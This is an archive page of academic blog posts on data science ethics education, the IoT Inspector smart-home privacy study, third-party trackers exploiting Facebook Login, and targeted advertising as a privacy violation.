October 6, 2022

Archives for April 2018

Ethics Education in Data Science: Classroom Topics and Assignments

[This blog post is a continuation of a recap of a recent workshop on data science ethics education.]

The creation of ethics modules that can be inserted into a variety of classes may help ensure that ethics as a subject is not marginalized and enable professors with little experience in philosophy or with fewer resources to incorporate ethics into their more technical classes. This post will outline some of the topics that professors have decided to cover in this field, as well as suggestions for types of assignments that may be useful. We hope that readers will consider ways to add these into their classes, and we welcome comments with further suggestions of topics or assignments.

With regards to ethics, some of the key topics that professors have taught about include: deontology, consequentialism, utilitarianism, virtue ethics, moral responsibility, cultural relativism, social contract, feminist ethics, justice consequentialism, the distinction between ethics and law, and the relationship between principles, standards, and rules.

Using these frameworks, professors can discuss a variety of topics, including: privacy, algorithmic bias, misinformation, intellectual property, surveillance, inequality, data collection, AI governance, free speech, transparency, security, anonymity, systemic risk, labor, net neutrality, accessibility, value-sensitive design, codes of ethics, predictive policing, virtual reality, ethics in industry, machine learning, clinical versus actuarial reasoning, issue spotting, and basic social science concepts.

In determining the most effective types of assignments to use, a common thread was the use of real world data sets or examples to engage students. Some effective assignment methods include:

Debates: Students split up into groups, each representing a different interest group or stakeholder, and then argue for that entity’s stance. This could entail asking students to justify the way that groups or people actually acted in the past, or it may have students act as decision makers and decide how they would act or react in a given situation.

Critique Existing Policies: Ask students to choose a particular company’s data policy, a data collection method at their University, a recent FCC policy, or an organization’s code of ethics and critique it. This gives students experience in understanding specific and concrete details of a policy and how it affects real people. By the end of the assignment, students may even be able to suggest changes to a company or university policy, providing impact beyond the classroom. This assignment can be framed to focus on either policy or ethics depending on the goal of the project.

Adversarial Mindset: Assignments can provide insight by placing students into the mind of the adversary, such as having them design a fake news campaign or attempt to dox their professor. Understanding how malicious users think can enhance students’ ability to counter such attacks or even to counter the mindset itself. However, such assignments should be framed very carefully – students may enjoy the thrill of such assignments and find them intellectually exciting, ignoring the elements that are ethically problematic.

Peer Audit: Asking students to review the ethics of a given project can be a useful exercise, and it may be even more interesting to students if they are able to review the work of their peers. Peer audits can pair nicely with more technical assignments from the same class – for example, if students are asked to capture and inspect network traffic in one assignment, the next assignment may entail reviewing other students’ methods for doing so to analyze any questionable methods. Graduate students can also be asked to audit their peer’s graduate research

Some recent case studies that may be interesting for students include: Cambridge Analytica’s use of Facebook data, the fatal crash of a self-driving Uber car, Facebook’s emotional contagion study, Encore censorship research, Chinese criminal facial tracking, Uber’s tracking of one night stands, Stanford’s “Gaydar” research, Black Mirror episodes, Latanya Sweeney’s anonymization work, NYPD Stop and Frisk Data, Predictive Policing, and COMPAS’s recidivism risk assessment tool.

A critical aspect of data science ethics education is ensuring that this field is well-respected so that students, universities, research communities, and industry respect and engage in efforts on this front. This may require a research-focused element, but efforts should also be dedicated to ensuring that students understand concretely how this applies to their lives and the lives of others. The field must encourage people to think beyond IRB and legal compliance, and to consider the impact of research or products even when they do not fall under the conventional conception of “human-subject research.” It will also be critical to engage industry in this field – largely because private companies impact our lives on a daily basis, but also because industry devotion to ethics can serve as an indicator to students that considering ethics is a worthwhile endeavor.

Although some have considered writing a textbook on this subject, technical capabilities and real-world examples change so rapidly that a textbook may be obsolete before it is even published. We encourage people to use other methods to share ideas on data science ethics education, such as blog posts, papers, or shared repositories with assignments and teaching tools that have been successful.

Announcing IoT Inspector: Studying Smart Home IoT Device Behavior

By Noah Apthorpe, Danny Y. Huang, Gunes Acar, Frank Li, Arvind Narayanan, Nick Feamster

An increasing number of home devices, from thermostats to light bulbs to garage door openers, are now Internet-connected. This “Internet of Things” (IoT) promises reduced energy consumption, more effective health management, and living spaces that react adaptively to users’ lifestyles. Unfortunately, recent IoT device hacks and personal data breaches have made security and privacy a focal point for IoT consumers, developers, and regulators.

Many IoT vulnerabilities sound like the plot of a science fiction dystopia. Internet-connected dolls allow strangers to spy on children remotely. Botnets of millions of security cameras and DVRs take down a global DNS service provider. Surgically implanted pacemakers are susceptible to remote takeover.

These security vulnerabilities, combined with the rapid evolution of IoT products, can leave consumers at risk, and in the dark about the risks they face when using these devices. For example, consumers may be unsure which companies receive personal information from IoT appliances, whether an IoT device has been hacked, or whether devices with always-on microphones listen to private conversations.

To shed light on the behavior of smart home IoT devices that consumers buy and install in their homes, we are announcing the IoT Inspector project.

Announcing IoT Inspector: Studying IoT Security and Privacy in Smart Homes

Today, at the Center for Information Technology Policy at Princeton, we are launching an ongoing initiative to study consumer IoT security and privacy, in an effort to understand the current state of smart home security and privacy in ways that ultimately help inform both technology and policy.

We have begun this effort by analyzing more than 50 home IoT devices ourselves. We are working on methods to help scale this analysis to more devices. If you have a particular device or type of device that you are concerned about, let us know. To learn more, visit the IoT Inspector website.

Our initial analyses have revealed several findings about home IoT security and privacy.

[Read more…]

No boundaries for Facebook data: third-party trackers abuse Facebook Login

by Steven Englehardt [0], Gunes Acar, and Arvind Narayanan

So far in the No boundaries series, we’ve uncovered how web trackers exfiltrate identifying information from web pages, browser password managers, and form inputs.

Today we report yet another type of surreptitious data collection by third-party scripts that we discovered: the exfiltration of personal identifiers from websites through “login with Facebook” and other such social login APIs. Specifically, we found two types of vulnerabilities [1]:

  • seven third parties abuse websites’ access to Facebook user data
  • one third party uses its own Facebook “application” to track users around the web.

 

Vulnerability 1: Third parties piggyback on Facebook access granted to websites

Diagram of third-party script accessing Facebook API

When a user clicks “Login with Facebook”, they will be prompted to allow the website they’re visiting to access some of their Facebook profile information [2]. Even after Facebook’s recent moves to lock down the feature, websites can request the user’s email address and  “public profile” (name, age range, gender, locale, and profile photo) without triggering a manual review by Facebook. Once the user allows access, any third-party Javascript embedded in the page, such as tracker.com in the figure above, can also retrieve the user’s Facebook information as if they were the first party [3].

[Read more…]

Ethics Education in Data Science

Data scientists in academia and industry are increasingly recognizing the importance of integrating ethics into data science curricula. Recently, a group of faculty and students gathered at New York University before the annual FAT* conference to discuss the promises and challenges of teaching data science ethics, and to learn from one another’s experiences in the classroom. This blog post is the first of two which will summarize the discussions had at this workshop.

There is general agreement that data science ethics should be taught, but less consensus about what its goals should be or how they should be pursued. Because the field is so nascent, there is substantial room for innovative thinking about what data science ethics ought to mean. In some respects, its goal may be the creation of “future citizens” of data science who are invested in the welfare of their communities and the world, and understand the social and political role of data science therein. But there are other models, too: for example, an alternative goal is to equip aspiring data scientists with technical tools and organizational processes for doing data science work that aligns with social values (like privacy and fairness). The group worked to identify some of the biggest challenges in this field, and when possible, some ways to address these tensions.

One approach to data science ethics education is including a standalone ethics course in the program’s curriculum. Another option is embedding discussions of ethics into existent courses in a more integrated way. There are advantages and disadvantages to both options. Standalone ethics courses may attract a wider variety of students from different disciplines than technical classes alone, which provides potential for rich discussions. They allow professors to cover basic normative theories before diving into specific examples without having to skip the basic theories or worry that students covered them in other course modules. Independent courses about ethics do not necessarily require cooperation from multiple professors or departments, making them easier to organize. However, many worry that teaching ethics separately from technical topics may marginalize ethics and make students perceive it as unimportant. Further, standalone courses can either be elective or mandatory. If elective, they may attract a self-selecting group of students, potentially leaving out other students who could benefit from exposure to the material; mandatory ethics classes may be seen as displacing other technical training students want and need. Embedding ethics within existent CS courses may avoid some of these problems and can also elevate the discourse around ethical dilemmas by ensuring that students are well-versed in the specific technical aspects of the problems they discuss.

Beyond course structure, ethics courses can be challenging for data science faculty to teach effectively. Many students used to more technical course material are challenged by the types of learning and engagement required in ethics courses, which are often reading-heavy. And the “answers” in ethics courses are almost never clear-cut. The lack of clear answers or easily constructed rubrics can complicate grading, since both students and faculty in computer science may be used to grading based on more objective criteria. However, this problem is certainly not insurmountable – humanities departments have dealt with this for centuries, and dialogue with them may illuminate some solutions to this problem. Asking students to complete frequent but short assignments rather than occasional long ones may make grading easier, and also encourages students to think about ethical issues on a more regular basis.

Institutional hurdles can hinder a university’s ability to satisfactorily address questions of ethics in data science. A dearth of technical faculty may make it difficult to offer a standalone course on ethics. A smaller faculty may push a university towards incorporating ethics into existent CS courses rather than creating a new class. Even this, however, requires that professors have the time and knowledge to do so, which is not always the case.

The next blog post will enumerate topics discussed and assignments used in courses that discuss ethics in data science.

Thanks to Karen Levy and Kathy Pham for their edits on a draft of this post.

When the business model *is* the privacy violation

Sometimes, when we worry about data privacy, we’re worried that data might fall into the wrong hands or be misused for unintended purposes. If I’m considering participating in a medical study, I’d want to know if insurance companies will obtain the data and use it against me. In these scenarios, we should look for ways to preserve the intended benefit while preventing unintended uses. In other words, achieving utility and privacy is not a zero-sum game. [1]

In other situations, the intended use is the privacy violation. The most prominent example is the tracking of our online and offline habits for targeted advertising. This business model is exactly what people object to, for a litany of reasons: targeting is creepy, manipulative, discriminatory, and reinforces harmful stereotypes. The data collection that enables targeted advertising involves an opaque surveillance infrastructure to which it’s impossible to give meaningfully informed consent, and the resulting databases give a few companies too much power over individuals and over democracy. [2]

In response to privacy laws, companies have tried to find technical measures that obfuscate the data but allow them carry on with the surveillance business as usual. But that’s just privacy theater. Technical steps that don’t affect the business model are of limited effectiveness, because the business model is fundamentally at odds with privacy; this is in fact a zero-sum game. [3]

For example, there’s an industry move to replace email addresses and other personal identifiers with hashed versions. But a hashed identifier is nevertheless a persistent, unique identifier that allows linking a person across databases, devices, and contexts, as well as targeting and manipulation on the basis of the associated data. Thus, hashing completely fails to address the underlying privacy concerns.

Policy makers and privacy advocates must recognize when privacy is a zero-sum game and when it isn’t. Policy makers like non-zero sum games because they can simultaneously satisfy different stakeholders. But they must acknowledge that sometimes this isn’t possible. In such cases, laws and regulations should avoid loopholes that companies might exploit by building narrow technical measures and claiming to be in compliance. [4]

Privacy advocates should recognize that framing a concern about data use practices as a privacy problem is a double-edged sword. Privacy can be a convenient label for a set of related concerns, but it gives industry a way to deflect attention from deeper ethical questions by interpreting privacy narrowly as confidentiality.

Thanks to Ed Felten and Nick Feamster for feedback on a draft.


[1] There is a vast computer science privacy literature predicated on the idea that we can have our cake and eat it too. For example, differential privacy seeks to enable analysis of data in the aggregate without revealing individual information. While there are disagreements on the specifics, such as whether de-identification results a win-win outcome, there is no question that the overall direction of privacy-preserving data analysis is an important one.

[2] In Mark Zuckerberg’s congressional testimony, he framed Facebook’s privacy woes as being about improper third-party access to the data. This is arguably a non-zero sum game, and one that Facebook is equipped to address without the need for legislation. However, the much bigger privacy problem is Facebook’s own data collection and business model, which is inherently at odds with privacy and is unlikely to be solved without legislation.

[3] There are research proposals for targeted advertising, such as Adnostic, that would improve privacy by drastically changing the business model, largely cutting out the tracking companies. Unsurprisingly, there has been no interest in these approaches from the traditional ad tech industry, but some browser vendors have experimented with similar ideas.

[4] As an example of avoiding the hashing loophole, the 2012 FTC privacy report is well written: it says that for data to be considered de-identified, “the company must achieve a reasonable level of justified confidence that the data cannot reasonably be used to infer information about, or otherwise be linked to, a particular consumer, computer, or other device.” It goes on to say that “reasonably” includes reasonable assumptions about the use of external data sources that might be available.